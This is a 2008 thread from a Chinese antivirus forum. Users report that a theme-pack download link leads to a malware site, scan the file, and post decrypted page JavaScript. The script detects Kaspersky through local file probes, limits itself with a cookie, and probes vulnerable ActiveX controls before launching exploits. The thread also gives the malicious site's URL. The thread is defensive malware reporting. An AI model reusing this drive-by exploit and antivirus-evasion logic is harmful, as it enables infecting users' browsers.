查看: 5860|回复: 11
收起左侧

软件下载区:深度美化主题包4.0,链接病毒网站

[复制链接]
mirsword
发表于 2008-1-8 20:21:33 | 显示全部楼层 |阅读模式
软件下载区:深度美化主题包4.0,链接病毒网站
伊の星
发表于 2008-1-9 13:05:53 | 显示全部楼层
帖子链接??
luohk
发表于 2008-1-9 13:23:48 | 显示全部楼层
的确耶,红伞报毒
不知是不是误报
我行我素2008
发表于 2008-1-9 13:33:25 | 显示全部楼层
请楼主给上帖子链接,最好附带扫描报告、相关截图,我们会及时处理的,谢谢
mirsword
 楼主| 发表于 2008-1-9 13:40:23 | 显示全部楼层
请斑竹打开该主题的下载链接,我的卡巴马上报毒
在软件下载区,主题为:深度美化主题包4.0
这是该主题留的下载链接:
http://www.yeswx.com/soft/sort02/sort071/down-124.html  下载连接。

[ 本帖最后由 mirsword 于 2008-1-9 13:43 编辑 ]
我行我素2008
发表于 2008-1-9 14:19:46 | 显示全部楼层

如图,看了下卡巴网页未报,下载软件扫描,稍候

如图
2008-01-09_141357.png
2008-01-09_141623.png
2008-01-09_141649.png
2008-01-09_141717.png
zzh161
发表于 2008-1-9 14:25:56 | 显示全部楼层
网页里确实有个js脚本有问题,费尔报的是addr[1].js

解密以后能看到一个动作是判断是否安装卡巴,后面有利用漏洞的语句

源码:
function bIsKIS(){for(i=2;i<26;i++){var kis6=new Image();var kis7=new Image();var root=String.fromCharCode(65+i);kis6.src="mk:@MSITStore:"+root+":\\Program%20Files\\Kaspersky%20Lab\\Kaspersky%20Internet%20Security%206.0\\Doc\\context.chm::/images/help.gif";kis7.src="mk:@MSITStore:"+root+":\\Program%20Files\\Kaspersky%20Lab\\Kaspersky%20Internet%20Security%207.0\\Doc\\context.chm::/images/help.gif";if(kis6.height==41||kis7.height==41)return true}return false}var Then=new Date();Then.setTime(Then.getTime()+24*60*60*1000);var aaffdasfascookie=new String(document.cookie);var cookieHeader="Cookie1=";if(!bIsKIS()&&aaffdasfascookie.indexOf(cookieHeader)==-1){document.cookie="Cookie1=POPWINDOS;expires="+Then.toGMTString();uuuuuuuuuuudddddddd="bbbbbbbbbbbbbbbbbbbbbfuck";try{if(new ActiveXObject("IERPCtl.IERPCtl.1"))document.write('')}catch(e){}try{if(navigator.userAgent.toLowerCase().indexOf("msie 7")==-1)document.write('')}catch(e){}uuuuuuuuuuudddddddd="bbbbbbbbbbbbbbbbbbbbbfuck";try{if(new ActiveXObject("BaiduBar.Tool.1"))document.write('')}catch(e){}try{if(new ActiveXObject("DPClient.Vod"))document.write('')}catch(e){}try{if(new ActiveXObject("GLCHAT.GLChatCtrl.1"))document.write('')}catch(e){}try{if(new ActiveXObject("MPS.StormPlayer.1"))document.write('')}catch(e){}uuuuuuuuuuudddddddd="bbbbbbbbbbbbbbbbbbbbbfuck"}
我行我素2008
发表于 2008-1-9 14:41:35 | 显示全部楼层
原帖由 zzh161 于 2008-1-9 14:25 发表
网页里确实有个js脚本有问题,费尔报的是addr[1].js

解密以后能看到一个动作是判断是否安装卡巴,后面有利用漏洞的语句

源码:
function bIsKIS(){for(i=2;i

谢谢富富版主,确实报了,请楼主给出原帖在版区链接,删帖处理

[ 本帖最后由 我行我素2008 于 2008-1-9 14:42 编辑 ]
下载过程.png
卡巴扫描中.png
卡巴扫描完.png
多平台扫描中.png
多平台扫描完毕.png
zzh161
发表于 2008-1-9 14:42:15 | 显示全部楼层

回复 8楼 我行我素2008 的帖子

为什么是富富。。。我不是chow
我行我素2008
发表于 2008-1-9 14:47:44 | 显示全部楼层
原帖由 zzh161 于 2008-1-9 14:42 发表
为什么是富富。。。我不是chow

简直忙晕了 是浩浩 谢谢你了
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-4-30 20:40 , Processed in 0.145496 second(s), 21 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表